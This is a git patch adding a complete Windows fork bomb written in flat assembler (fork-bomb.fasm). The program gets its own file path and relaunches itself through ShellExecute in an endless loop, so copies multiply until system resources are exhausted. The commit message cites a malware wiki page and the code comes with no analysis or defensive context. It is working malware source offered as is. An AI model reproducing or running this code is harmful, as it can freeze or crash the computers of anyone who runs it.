From 8e131fa898b480697e33e964857cb46a48cc576e Mon Sep 17 00:00:00 2001
From: MD XF <rkcoder2002@gmail.com>
Date: Tue, 17 Oct 2017 09:12:28 -0700
Subject: [PATCH] Create fork-bomb.fasm

http://malware.wikia.com/wiki/Fork_Bomb
---
 fork-bomb.fasm | 36 ++++++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 fork-bomb.fasm

diff --git a/fork-bomb.fasm b/fork-bomb.fasm
new file mode 100644
index 0000000..788434d
--- /dev/null
+++ b/fork-bomb.fasm
@@ -0,0 +1,36 @@
+format PE GUI 4.0
+entry start
+section '.text' code readable executable
+  start:
+        pushd 1000
+        pushd path
+        pushd 0
+        call [GetModuleFileName]
+   @@:
+        pushd 1
+        pushd 0
+        pushd 0
+        pushd path
+        pushd command
+        pushd 0
+        call [ShellExecute]
+        jmp @b
+section '.data' data readable writeable
+  path rb 1000
+  command db "open"
+section '.idata' import data readable writeable
+  dd 0,0,0,RVA kernel32id,RVA kernel32
+  dd 0,0,0,RVA shell32id,RVA shell32
+  kernel32:
+    GetModuleFileName dd RVA _GetModuleFileName
+    dd 0
+  shell32:
+    ShellExecute dd RVA _ShellExecute
+    dd 0
+  kernel32id db 'kernel32.dll',0
+  shell32id db 'shell32.dll',0
+  _GetModuleFileName dw 0
+    db 'GetModuleFileNameA',0
+  _ShellExecute dw 0
+    db 'ShellExecuteA',0
+section '.reloc' fixups data readable discardable